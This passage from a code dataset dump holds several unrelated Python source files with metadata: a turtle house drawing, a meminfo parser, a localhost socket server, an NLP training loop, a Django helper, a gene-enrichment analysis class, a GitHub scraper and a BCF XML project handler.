(left)\nt.penup()\nt.forward(size*0.8)\nt.right(90)\nt.forward(size*0.2)\nt.pendown()\nsquare(size*0.2)\nt.penup()\n#window 2 (right)\nt.forward(size*0.4)\nt.pendown()\nsquare(size*0.2)\nt.penup()\n# roof\nt.pencolor(\"red\")\nt.backward(size*0.6)\nt.left(90)\nt.forward(size*0.2)\nt.pendown()\nt.right(30)\ntriangle(size)\n# house door\nt.pencolor(\"black\")\nt.penup()\nt.right(150)\nt.forward(size)\nt.left(90)\nt.forward(size*0.4)\nt.left(90)\nt.pendown()\nrectangle(size*0.4)\nt.right(90)\nt.forward(size*0.6)\n","sub_path":"03turtlepython/l2 4 houses.py","file_name":"l2 4 houses.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149343138","text":"import re\nfrom util import LOGGER\n\n# Decent documentation of /proc/meminfo:\n# https://www.centos.org/docs/5/html/5.2/Deployment_Guide/s2-proc-meminfo.html\n# https://access.redhat.com/solutions/406773\n\n# An example is in test/proc-meminfo.tail\n\ndef parse_meminfo(stats, data):\n for line in data:\n parts = re.split('[ :]+', line.strip())\n if len(parts) < 2:\n LOGGER.debug('Skipping meminfo line that is too short: %s' % line)\n else:\n stats.meminfo[parts[0]] = int(parts[1]) * 1024","sub_path":"parsers/meminfo.py","file_name":"meminfo.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148536383","text":"#!/bin/env python\n\nimport socket\n\nserver = socket.socket()\naddr = ('127.0.0.1',8080)\nserver.bind(addr)\nserver.listen(5)\n\nconn,address = server.accept()\n\nconn.send('hello, socket')\n\nconn.close()\n\n","sub_path":"day/socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27524667","text":"\n\nfrom xai.brain.wordbase.nouns._treasurer import _TREASURER\n\n#calss header\nclass _TREASURERS(_TREASURER, ):\n\tdef __init__(self,): \n\t\t_TREASURER.__init__(self)\n\t\tself.name = \"TREASURERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"treasurer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_treasurers.py","file_name":"_treasurers.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294395701","text":"optimizer = AdamW(model.parameter(),lr = 2e-5, correct_bias=False)\n\ntotal_steps = len(train_data_loader) * EPOCHS\n\nscheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=total_steps\n)\nloss_fn = nn.CrossEntropyLoss()\n\ndef train_epoch(model, data_loader, loss_fn, optimizer, device, scheduler, n_examples):\n mpdel= model.train()\n losses = []\n correct_predictions = 0\n\n for i in data_loader:\n input_ids = i['input_ids']\n attention_mask=i['attention_mask']\n targets = i['targets']\n\n outputs=model(input_ids = input_ids,attention_mask=attention_mask)\n\n _ , pred = torch.max(outputs, dim=1)\n loss = loss_fn(outputs, targets)\n\n correct_predictions +=torch.sum(preds == targets)\n losses.append(loss.item())\n\n loass.backward()\n nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()\n return correct_prediction.double() / n_examples, np.mean(losses)\n\n\ndef eval_model(model, data_loader, loss_fn, device, n_examples):\n model","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360028461","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/image/utils.py\n\n.. enthaelt Hilfefunktionen fuer Bilder\n Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 22.03.2007 Beginn der Arbeit\n\"\"\"\n\nimport string\nfrom PIL import Image\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\nfrom dms_ext.extension import * # dms-Funktionen ueberschreiben\n\n# -----------------------------------------------------\ndef get_actions(request, user_perms, item_container):\n from django.template.loader import get_template\n from django.template import Context\n t = get_template('app/file/manage_options.html')\n nPos = max ( string.rfind ( request.path, '/add/' ),\n string.rfind ( request.path, '/edit/' ),\n )\n if nPos > -1 :\n path = request.path[:nPos]\n show_mode = True\n else :\n path = request.path\n show_mode = False\n if ( string.find(request.path, '/add/') >= 0 ) :\n edit_mode = False\n elif ( string.find(request.path, '/edit/') >= 0 ) :\n edit_mode = False\n else :\n edit_mode = request.user.is_authenticated()\n c = Context ( { 'authenticated' : request.user.is_authenticated(),\n 'show_mode' : show_mode,\n 'edit_mode' : edit_mode,\n 'user_perms' : user_perms,\n 'user_name' : request.user,\n 'path' : get_site_url(item_container,\n item_container.item.name), } )\n return t.render ( c)\n\n# -----------------------------------------------------\ndef get_image_size(filename):\n try:\n im = Image.open(filename)\n width = im.size[0]\n height = im.size[1]\n except:\n width = height = 0\n return width, height\n","sub_path":"image/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633719472","text":"# -*- coding: UTF-8 -*-\r\nfrom itertools import islice\r\nimport pickle as pk\r\nfrom scipy import stats\r\n\r\n\r\nclass Enrichment(object):\r\n def __init__(self,genelist_input):\r\n pass\r\n\r\n # 构建富集分析所需要数据\r\n # self._build_enrichment_data_main()\r\n\r\n # 富集分析\r\n # self._enrichment_main()\r\n self.genelist_input=genelist_input\r\n\r\n def _enrichment_main(self):\r\n\r\n gene_list = ['OGDH', 'DLST', 'BCAT1', 'ACACA', 'MAT1A', 'MAT2A', 'ALDH3B2', 'ALDH1A3',\r\n 'ALDH3A1', 'PMM1', 'GMPPB', 'GMPPA', 'GMDS', 'TSTA3']\r\n print(\"lucas--kuo_Enrichment.py--_enrichment_main get: \",self.genelist_input)\r\n enrichment_data = 'static/kuo_enrichmentGO/enrichment_data.bin'\r\n top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc = self.enrichment(self.genelist_input, enrichment_data)\r\n return top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc\r\n\r\n\r\n def _build_enrichment_data_main(self):\r\n pass\r\n\r\n self.path = 'I:\\\\Work\\\\rech\\\\SympGeneSet\\\\data\\\\enrichment\\\\data\\\\'\r\n self.pathway_file = self.path + 'Pathway_genes.txt'\r\n self.go_file = self.path + 'homo_GO_term_all.txt'\r\n self.go_type_file = self.path + 'go_info.txt'\r\n self.out_file = self.path + 'enrichment_data.bin'\r\n self.build_enrichment_data()\r\n\r\n\r\n def enrichment(self, gene_list, enrichment_data):\r\n pass\r\n\r\n # load pathways and go terms\r\n pw_info, pw_genes, go_info, go_genes = self.load_enrichment_data(enrichment_data)\r\n\r\n gene_set = set(gene_list)\r\n n_gene = len(gene_set)\r\n\r\n # get enriched pathways\r\n pw_list = []\r\n for pw_id, pw_gene_set in pw_genes.items():\r\n inter_set = pw_gene_set & gene_set\r\n if len(inter_set) == 0: continue\r\n v00 = len(inter_set)\r\n v01 = n_gene - v00\r\n v10 = pw_info.get(pw_id)[1]\r\n v11 = pw_info.get(pw_id)[2]\r\n fourfold = [[v00, v01], [v10, v11]]\r\n odd_ratio, p_value = stats.fisher_exact(fourfold, alternative='greater')\r\n genes = ','.join(list(inter_set))\r\n pw_name = pw_info.get(pw_id)[0]\r\n if p_value < 0.05:\r\n pw_list.append([p_value, odd_ratio, pw_id, pw_name, v00, genes])\r\n\r\n pw_list.sort()\r\n # print(pw_list)\r\n top_pw_list = list()\r\n for temp in pw_list[0:10]:\r\n top_pw_list.append([str(x) for x in temp])\r\n\r\n\r\n\r\n # get enriched go terms (bp, mf, cc)\r\n go_genes_bp = go_genes.get('biological_process')\r\n go_genes_mf = go_genes.get('molecular_function')\r\n go_genes_cc = go_genes.get('cellular_component')\r\n\r\n top_go_list_bp = self.get_enriched_go(go_genes_bp, gene_list, go_info)\r\n top_go_list_mf = self.get_enriched_go(go_genes_mf, gene_list, go_info)\r\n top_go_list_cc = self.get_enriched_go(go_genes_cc, gene_list, go_info)\r\n\r\n print('pathway:', top_pw_list)\r\n print('top_go_list_bp:', top_go_list_bp)\r\n print('top_go_list_mf:', top_go_list_mf)\r\n print('top_go_list_cc:', top_go_list_cc)\r\n\r\n return top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc\r\n\r\n @staticmethod\r\n def get_enriched_go(go_genes, gene_list, go_info):\r\n gene_set = set(gene_list)\r\n n_gene = len(gene_set)\r\n go_list = []\r\n for go_id, go_gene_set in go_genes.items():\r\n inter_set = go_gene_set & gene_set\r\n if len(inter_set) == 0: continue\r\n v00 = len(inter_set)\r\n v01 = n_gene - v00\r\n v10 = go_info.get(go_id)[1]\r\n v11 = go_info.get(go_id)[2]\r\n fourfold = [[v00, v01], [v10, v11]]\r\n odd_ratio, p_value = stats.fisher_exact(fourfold, alternative='greater')\r\n genes = ','.join(list(inter_set))\r\n go_name = go_info.get(go_id)[0]\r\n if p_value < 0.05:\r\n go_list.append([p_value, odd_ratio, go_id, go_name, v00, genes])\r\n\r\n go_list.sort()\r\n top_go_list = list()\r\n for temp in go_list[0:10]:\r\n top_go_list.append([str(x) for x in temp])\r\n # top_go_list = [str(x) for x in go_list[0:10]]\r\n # print(top_go_list)\r\n return top_go_list\r\n\r\n @staticmethod\r\n def load_enrichment_data(enrichment_data):\r\n with open(enrichment_data, 'rb') as fr:\r\n pw_info = dict(pk.load(fr))\r\n pw_genes = dict(pk.load(fr))\r\n go_info = dict(pk.load(fr))\r\n go_genes = dict(pk.load(fr))\r\n return pw_info, pw_genes, go_info, go_genes\r\n\r\n\r\n def build_enrichment_data(self):\r\n\r\n pw_info = dict()\r\n pw_genes = dict()\r\n with open(self.pathway_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n p_name, pid, gene = line.strip().split('\\t')\r\n pw_info.setdefault(pid, [p_name.strip()])\r\n pw_genes.setdefault(pid, set())\r\n pw_genes[pid].add(gene)\r\n\r\n for pid, gene_set in pw_genes.items():\r\n pw_info[pid].append(len(gene_set))\r\n pw_info[pid].append(30000-len(gene_set))\r\n\r\n go_info = dict()\r\n go_genes = dict()\r\n go_genes.setdefault('biological_process', dict())\r\n go_genes.setdefault('molecular_function', dict())\r\n go_genes.setdefault('cellular_component', dict())\r\n\r\n go_type_dict = dict()\r\n with open(self.go_type_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n arr = line.strip().split('\\t')\r\n go_id = arr[0]\r\n go_type = arr[2]\r\n go_type_dict.setdefault(go_id, go_type)\r\n\r\n\r\n with open(self.go_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n arr = line.strip().split('\\t')\r\n gene = arr[2]\r\n go_id = arr[3]\r\n go_name = arr[4]\r\n go_info.setdefault(go_id, [go_name])\r\n\r\n go_type = go_type_dict.get(go_id)\r\n if go_type is not None:\r\n go_genes[go_type].setdefault(go_id, set())\r\n go_genes[go_type][go_id].add(gene)\r\n\r\n for _, go_dict in go_genes.items():\r\n for go_id, gene_set in go_dict.items():\r\n go_info[go_id].append(len(gene_set))\r\n go_info[go_id].append(30000-len(gene_set))\r\n\r\n\r\n with open(self.out_file, 'wb') as fw:\r\n fw.truncate()\r\n pk.dump(pw_info, fw, True)\r\n pk.dump(pw_genes, fw, True)\r\n pk.dump(go_info, fw, True)\r\n pk.dump(go_genes, fw, True)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n en = Enrichment()","sub_path":"kuo_Enrichment.py","file_name":"kuo_Enrichment.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81686612","text":"\"\"\"Scrapes Github for Fabrikate Component Information.\"\"\"\nfrom requests import get\nimport re\n\nfrom .component import Component\n\n# URL to the Fabrikate Component Definitions\nCOMP_DEFS_URL = \"https://api.github.com/repos/microsoft/fabrikate-definitions/contents/definitions\"\n\n\ndef get_repo_components():\n \"\"\"Return the Fabrikate Component List.\"\"\"\n json_obj = json_get(COMP_DEFS_URL)\n if json_obj:\n components = parse_json(json_obj)\n components = remove_fabrikate_prefix(components)\n return components\n raise Exception('JSON not retrieved. URL:{}'.format(COMP_DEFS_URL))\n\n\ndef parse_json(json_list):\n \"\"\"Parse json to get each component.\"\"\"\n components = []\n for entry in json_list:\n component = Component(entry[\"name\"], source=entry[\"html_url\"])\n components.append(component)\n return components\n\n\ndef remove_fabrikate_prefix(components):\n \"\"\"Remove the fabrikate prefix from the Component names.\"\"\"\n for component in components:\n component.name = re.sub('^fabrikate-', '', component.name)\n return components\n\n\ndef json_get(url):\n \"\"\"Get the json at the url.\"\"\"\n resp = get(url)\n if resp.status_code != 200:\n return None\n return resp.json()\n","sub_path":"hydrate/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298401431","text":"import os\nimport uuid\nimport shutil\nimport zipfile\nimport logging\nimport tempfile\nimport bcf.data\nfrom datetime import datetime\nfrom xml.dom import minidom\nfrom xmlschema import XMLSchema\nfrom contextlib import contextmanager\nfrom shutil import copyfile\n\n\ncwd = os.path.dirname(os.path.realpath(__file__))\n\n\n@contextmanager\ndef cd(newdir):\n prevdir = os.getcwd()\n os.chdir(os.path.expanduser(newdir))\n try:\n yield\n finally:\n os.chdir(prevdir)\n\n\nclass BcfXml:\n def __init__(self):\n self.filepath = None\n self.logger = logging.getLogger(\"bcfxml\")\n self.author = \"john@doe.com\"\n self.project = bcf.data.Project()\n self.version = \"2.1\"\n self.topics = {}\n\n def new_project(self):\n self.project.project_id = str(uuid.uuid4())\n self.project.name = \"New Project\"\n self.topics = {}\n if self.filepath:\n self.close_project()\n self.filepath = tempfile.mkdtemp()\n self.edit_project()\n self.edit_version()\n\n def get_project(self, filepath=None):\n if not filepath:\n return self.project\n zip_file = zipfile.ZipFile(filepath)\n self.filepath = tempfile.mkdtemp()\n zip_file.extractall(self.filepath)\n if os.path.isfile(os.path.join(self.filepath, \"project.bcfp\")):\n data = self._read_xml(\"project.bcfp\", \"project.xsd\")\n self.project.extension_schema = data[\"ExtensionSchema\"]\n if \"Project\" in data:\n self.project.project_id = data[\"Project\"][\"@ProjectId\"]\n self.project.name = data[\"Project\"].get(\"Name\")\n return self.project\n\n def edit_project(self):\n self.document = minidom.Document()\n root = self._create_element(self.document, \"ProjectExtension\")\n project = self._create_element(\n root, \"Project\", {\"ProjectId\": self.project.project_id}\n )\n self._create_element(project, \"Name\", text=self.project.name)\n self._create_element(root, \"ExtensionSchema\", text=\"extensions.xsd\")\n with open(os.path.join(self.filepath, \"project.bcfp\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def save_project(self, filepath):\n with cd(self.filepath):\n zip_file = zipfile.ZipFile(filepath, \"w\", zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk(\"./\"):\n for file in files:\n zip_file.write(os.path.join(root, file))\n zip_file.close()\n\n def get_version(self):\n data = self._read_xml(\"bcf.version\", \"version.xsd\")\n self.version = data[\"@VersionId\"]\n return self.version\n\n def edit_version(self):\n self.document = minidom.Document()\n root = self._create_element(\n self.document, \"Version\", {\"VersionId\": self.version}\n )\n version = self._create_element(root, \"DetailedVersion\", text=self.version)\n with open(os.path.join(self.filepath, \"bcf.version\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def get_topics(self):\n self.topics = {}\n topics = []\n subdirs = []\n for (dirpath, dirnames, filenames) in os.walk(self.filepath):\n subdirs = dirnames\n break\n for subdir in subdirs:\n self.topics[subdir] = self.get_topic(subdir)\n return self.topics\n\n def get_header(self, guid):\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Header\" not in data:\n return\n header = bcf.data.Header()\n for item in data[\"Header\"][\"File\"]:\n header_file = bcf.data.HeaderFile()\n optional_keys = {\n \"filename\": \"Filename\",\n \"date\": \"Date\",\n \"reference\": \"Reference\",\n \"ifc_project\": \"@IfcProject\",\n \"ifc_spatial_structure_element\": \"@IfcSpatialStructureElement\",\n \"is_external\": \"@isExternal\",\n }\n for key, value in optional_keys.items():\n if value in item:\n setattr(header_file, key, item[value])\n header.files.append(header_file)\n self.topics[guid].header = header\n return header\n\n def get_topic(self, guid):\n if guid in self.topics:\n return self.topics[guid]\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n topic = bcf.data.Topic()\n self.topics[guid] = topic\n\n mandatory_keys = {\n \"guid\": \"@Guid\",\n \"title\": \"Title\",\n \"creation_date\": \"CreationDate\",\n \"creation_author\": \"CreationAuthor\",\n }\n for key, value in mandatory_keys.items():\n setattr(topic, key, data[\"Topic\"][value])\n\n optional_keys = {\n \"priority\": \"Priority\",\n \"index\": \"Index\",\n \"labels\": \"Labels\",\n \"reference_links\": \"ReferenceLink\",\n \"modified_date\": \"ModifiedDate\",\n \"modified_author\": \"ModifiedAuthor\",\n \"due_date\": \"DueDate\",\n \"assigned_to\": \"AssignedTo\",\n \"stage\": \"Stage\",\n \"description\": \"Description\",\n \"topic_status\": \"@TopicStatus\",\n \"topic_type\": \"@TopicType\",\n }\n for key, value in optional_keys.items():\n if value in data[\"Topic\"]:\n setattr(topic, key, data[\"Topic\"][value])\n\n if \"BimSnippet\" in data[\"Topic\"]:\n bim_snippet = bcf.data.BimSnippet()\n keys = {\n \"snippet_type\": \"@SnippetType\",\n \"is_external\": \"@IsExternal\",\n \"reference\": \"Reference\",\n \"reference_schema\": \"ReferenceSchema\",\n }\n for key, value in keys.items():\n if value in data[\"Topic\"][\"BimSnippet\"]:\n setattr(bim_snippet, key, data[\"Topic\"][\"BimSnippet\"][value])\n topic.bim_snippet = bim_snippet\n\n if \"DocumentReference\" in data[\"Topic\"]:\n for item in data[\"Topic\"][\"DocumentReference\"]:\n document_reference = bcf.data.DocumentReference()\n keys = {\n \"referenced_document\": \"ReferencedDocument\",\n \"is_external\": \"@IsExternal\",\n \"guid\": \"@Guid\",\n \"description\": \"Description\",\n }\n for key, value in keys.items():\n if value in item:\n setattr(document_reference, key, item[value])\n topic.document_references.append(document_reference)\n\n if \"RelatedTopic\" in data[\"Topic\"]:\n for item in data[\"Topic\"][\"RelatedTopic\"]:\n related_topic = bcf.data.RelatedTopic()\n related_topic.guid = item[\"@Guid\"]\n topic.related_topics.append(related_topic)\n return topic\n\n def add_topic(self, topic=None):\n if topic is None:\n topic = bcf.data.Topic()\n if not topic.guid:\n topic.guid = str(uuid.uuid4())\n if not topic.title:\n topic.title = \"New Topic\"\n os.mkdir(os.path.join(self.filepath, topic.guid))\n self.edit_topic(topic)\n return topic\n\n def edit_topic(self, topic):\n if not topic.creation_date:\n topic.creation_date = datetime.utcnow().isoformat()\n topic.creation_author = self.author\n else:\n topic.modified_date = datetime.utcnow().isoformat()\n topic.modified_author = self.author\n\n self.document = minidom.Document()\n root = self._create_element(self.document, \"Markup\")\n\n self.write_header(topic.header, root)\n\n topic_el = self._create_element(\n root,\n \"Topic\",\n {\n \"Guid\": topic.guid,\n \"TopicType\": topic.topic_type,\n \"TopicStatus\": topic.topic_status,\n },\n )\n\n for reference_link in topic.reference_links:\n self._create_element(topic_el, \"ReferenceLink\", text=reference_link)\n\n text_map = {\n \"Title\": topic.title,\n \"Priority\": topic.priority,\n \"Index\": topic.index,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(topic_el, key, text=value)\n\n for label in topic.labels:\n self._create_element(topic_el, \"Labels\", text=label)\n\n text_map = {\n \"CreationDate\": topic.creation_date,\n \"CreationAuthor\": topic.creation_author,\n \"ModifiedDate\": topic.modified_date,\n \"ModifiedAuthor\": topic.modified_author,\n \"DueDate\": topic.due_date,\n \"AssignedTo\": topic.assigned_to,\n \"Stage\": topic.stage,\n \"Description\": topic.description,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(topic_el, key, text=value)\n\n if topic.bim_snippet:\n bim_snippet = self._create_element(\n topic_el,\n \"BimSnippet\",\n {\n \"SnippetType\": topic.bim_snippet.snippet_type,\n \"isExternal\": topic.bim_snippet.is_external,\n },\n )\n self._create_element(\n bim_snippet, \"Reference\", text=topic.bim_snippet.reference\n )\n self._create_element(\n bim_snippet, \"ReferenceSchema\", text=topic.bim_snippet.reference_schema\n )\n for reference in topic.document_references:\n reference_el = self._create_element(\n topic_el,\n \"DocumentReference\",\n {\"Guid\": reference.guid, \"isExternal\": reference.is_external},\n )\n self._create_element(\n reference_el, \"ReferencedDocument\", text=reference.referenced_document\n )\n self._create_element(\n reference_el, \"Description\", text=reference.description\n )\n for related_topic in topic.related_topics:\n self._create_element(topic_el, \"RelatedTopic\", {\"Guid\": related_topic.guid})\n\n self.write_comments(topic.comments, root)\n self.write_viewpoints(topic.viewpoints, root, topic)\n\n with open(os.path.join(self.filepath, topic.guid, \"markup.bcf\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def write_header(self, header, root):\n if not header or not header.files:\n return\n header_el = self._create_element(root, \"Header\")\n for f in header.files:\n file_el = self._create_element(\n header_el,\n \"File\",\n {\n \"IfcProject\": f.ifc_project,\n \"IfcSpatialStructureElement\": f.ifc_spatial_structure_element,\n \"isExternal\": f.is_external,\n },\n )\n self._create_element(file_el, \"Filename\", text=f.filename)\n self._create_element(file_el, \"Date\", text=f.date)\n self._create_element(file_el, \"Reference\", text=f.reference)\n\n def write_comments(self, comments, root):\n for comment in comments.values():\n comment_el = self._create_element(root, \"Comment\", {\"Guid\": comment.guid})\n text_map = {\n \"Date\": comment.date,\n \"Author\": comment.author,\n \"Comment\": comment.comment,\n \"ModifiedDate\": comment.modified_date,\n \"ModifiedAuthor\": comment.modified_author,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(comment_el, key, text=value)\n if comment.viewpoint:\n self._create_element(\n comment_el, \"Viewpoint\", {\"Guid\": comment.viewpoint.guid}\n )\n\n def add_comment(self, topic, comment=None):\n if comment is None:\n comment = bcf.data.Comment()\n if not comment.guid:\n comment.guid = str(uuid.uuid4())\n if not comment.comment:\n comment.comment = \"'Free software' is a matter of liberty, not price. To understand the concept, you should think of 'free' as in 'free speech,' not as in 'free beer'.\"\n topic.comments[comment.guid] = comment\n self.edit_comment(comment, topic)\n\n def edit_comment(self, comment, topic):\n if not comment.date:\n comment.date = datetime.utcnow().isoformat()\n comment.author = self.author\n else:\n comment.modified_date = datetime.utcnow().isoformat()\n comment.modified_author = self.author\n self.edit_topic(topic)\n\n def delete_comment(self, guid, topic):\n if guid in topic.comments:\n del topic.comments[guid]\n self.edit_topic(topic)\n\n def delete_topic(self, guid):\n if guid in self.topics:\n del self.topics[guid]\n shutil.rmtree(os.path.join(self.filepath, guid))\n\n def write_viewpoints(self, viewpoints, root, topic):\n for viewpoint in viewpoints.values():\n viewpoint_el = self._create_element(\n root, \"ViewPoint\", {\"Guid\": viewpoint.guid}\n )\n text_map = {\n \"Viewpoint\": viewpoint.viewpoint,\n \"Snapshot\": viewpoint.snapshot,\n \"Index\": viewpoint.index,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(viewpoint_el, key, text=value)\n self.write_viewpoint(viewpoint, topic)\n\n def write_viewpoint(self, viewpoint, topic):\n document = minidom.Document()\n root = self._create_element(\n document, \"VisualizationInfo\", {\"Guid\": viewpoint.guid}\n )\n self.write_viewpoint_components(viewpoint, root)\n self.write_viewpoint_orthogonal_camera(viewpoint, root)\n self.write_viewpoint_perspective_camera(viewpoint, root)\n self.write_viewpoint_lines(viewpoint, root)\n self.write_viewpoint_clipping_planes(viewpoint, root)\n self.write_viewpoint_bitmaps(viewpoint, root)\n with open(\n os.path.join(self.filepath, topic.guid, viewpoint.viewpoint), \"wb\"\n ) as f:\n f.write(document.toprettyxml(encoding=\"utf-8\"))\n\n def write_viewpoint_components(self, viewpoint, parent):\n if not viewpoint.components:\n return\n components_el = self._create_element(parent, \"Components\")\n if viewpoint.components.view_setup_hints:\n view_setup_hints = self._create_element(\n components_el,\n \"ViewSetupHints\",\n {\n \"SpacesVisible\": viewpoint.components.view_setup_hints.spaces_visible,\n \"SpaceBoundariesVisible\": viewpoint.components.view_setup_hints.space_boundaries_visible,\n \"OpeningsVisible\": viewpoint.components.view_setup_hints.openings_visible,\n },\n )\n if viewpoint.components.selection:\n selection_el = self._create_element(components_el, \"Selection\")\n for selection in viewpoint.components.selection:\n self.write_component(selection, selection_el)\n visibility = self._create_element(\n components_el,\n \"Visibility\",\n {\"DefaultVisibility\": viewpoint.components.visibility.default_visibility},\n )\n if viewpoint.components.visibility.exceptions:\n exceptions_el = self._create_element(visibility, \"Exceptions\")\n for exception in viewpoint.components.visibility.exceptions:\n self.write_component(exception, exceptions_el)\n if viewpoint.components.coloring:\n coloring_el = self._create_element(components_el, \"Coloring\")\n for color in viewpoint.components.coloring:\n color_el = self._create_element(\n coloring_el, \"Color\", {\"Color\": color.color}\n )\n for component in color.components:\n self.write_component(component, color_el)\n\n def write_viewpoint_orthogonal_camera(self, viewpoint, parent):\n if not viewpoint.orthogonal_camera:\n return\n camera = viewpoint.orthogonal_camera\n camera_el = self._create_element(parent, \"OrthogonalCamera\")\n camera_view_point = self._create_element(camera_el, \"CameraViewPoint\")\n self.write_vector(camera_view_point, camera.camera_view_point)\n camera_direction = self._create_element(camera_el, \"CameraDirection\")\n self.write_vector(camera_direction, camera.camera_direction)\n camera_up_vector = self._create_element(camera_el, \"CameraUpVector\")\n self.write_vector(camera_up_vector, camera.camera_up_vector)\n self._create_element(\n camera_el, \"ViewToWorldScale\", text=camera.view_to_world_scale\n )\n\n def write_viewpoint_perspective_camera(self, viewpoint, parent):\n if not viewpoint.perspective_camera:\n return\n camera = viewpoint.perspective_camera\n camera_el = self._create_element(parent, \"PerspectiveCamera\")\n camera_view_point = self._create_element(camera_el, \"CameraViewPoint\")\n self.write_vector(camera_view_point, camera.camera_view_point)\n camera_direction = self._create_element(camera_el, \"CameraDirection\")\n self.write_vector(camera_direction, camera.camera_direction)\n camera_up_vector = self._create_element(camera_el, \"CameraUpVector\")\n self.write_vector(camera_up_vector, camera.camera_up_vector)\n self._create_element(camera_el, \"FieldOfView\", text=camera.field_of_view)\n\n def write_viewpoint_lines(self, viewpoint, parent):\n if not viewpoint.lines:\n return\n lines_el = self._create_element(parent, \"Lines\")\n for line in viewpoint.lines:\n line_el = self._create_element(lines_el, \"Line\")\n start_point_el = self._create_element(line_el, \"StartPoint\")\n self.write_vector(start_point_el, line.start_point)\n end_point_el = self._create_element(line_el, \"EndPoint\")\n self.write_vector(end_point_el, line.end_point)\n\n def write_viewpoint_clipping_planes(self, viewpoint, parent):\n if not viewpoint.clipping_planes:\n return\n planes_el = self._create_element(parent, \"ClippingPlanes\")\n for plane in viewpoint.clipping_planes:\n plane_el = self._create_element(planes_el, \"ClippingPlane\")\n location_el = self._create_element(plane_el, \"Location\")\n self.write_vector(location_el, plane.location)\n direction_el = self._create_element(plane_el, \"Direction\")\n self.write_vector(direction_el, plane.direction)\n\n def write_viewpoint_bitmaps(self, viewpoint, parent):\n if not viewpoint.bitmaps:\n return\n for bitmap in viewpoint.bitmaps:\n bitmap_el = self._create_element(parent, \"Bitmap\")\n\n text_map = {\"Bitmap\": bitmap.bitmap_type, \"Reference\": bitmap.reference}\n for key, value in text_map.items():\n self._create_element(bitmap_el, key, text=value)\n\n location_el = self._create_element(bitmap_el, \"Location\")\n self.write_vector(location_el, bitmap.location)\n normal_el = self._create_element(bitmap_el, \"Normal\")\n self.write_vector(normal_el, bitmap.normal)\n up_el = self._create_element(bitmap_el, \"Up\")\n self.write_vector(up_el, bitmap.up)\n\n self._create_element(bitmap_el, \"Height\", text=bitmap.height)\n\n def write_vector(self, parent, from_obj):\n self._create_element(parent, \"X\", text=from_obj.x)\n self._create_element(parent, \"Y\", text=from_obj.y)\n self._create_element(parent, \"Z\", text=from_obj.z)\n\n def write_component(self, data, parent):\n component_el = self._create_element(\n parent, \"Component\", {\"IfcGuid\": data.ifc_guid}\n )\n text_map = {\n \"OriginatingSystem\": data.originating_system,\n \"AuthoringToolId\": data.authoring_tool_id,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(component_el, key, text=value)\n\n def add_viewpoint(self, topic, viewpoint=None):\n if not viewpoint:\n viewpoint = bcf.data.Viewpoint()\n if not viewpoint.guid:\n viewpoint.guid = str(uuid.uuid4())\n if not viewpoint.viewpoint:\n viewpoint.viewpoint = f\"{viewpoint.guid}.bcfv\"\n if viewpoint.snapshot:\n topic_filepath = os.path.join(self.filepath, topic.guid)\n filepath = os.path.join(topic_filepath, viewpoint.snapshot)\n if not os.path.exists(filepath):\n filename = viewpoint.guid + os.path.splitext(viewpoint.snapshot)[-1]\n copyfile(viewpoint.snapshot, os.path.join(topic_filepath, filename))\n viewpoint.snapshot = filename\n topic.viewpoints[viewpoint.guid] = viewpoint\n self.edit_topic(topic)\n\n def delete_viewpoint(self, guid, topic):\n if guid not in topic.viewpoints:\n return\n viewpoint = topic.viewpoints[guid]\n if viewpoint.snapshot:\n filepath = os.path.join(self.filepath, topic.guid, viewpoint.snapshot)\n if os.path.exists(filepath):\n os.remove(filepath)\n if viewpoint.viewpoint:\n filepath = 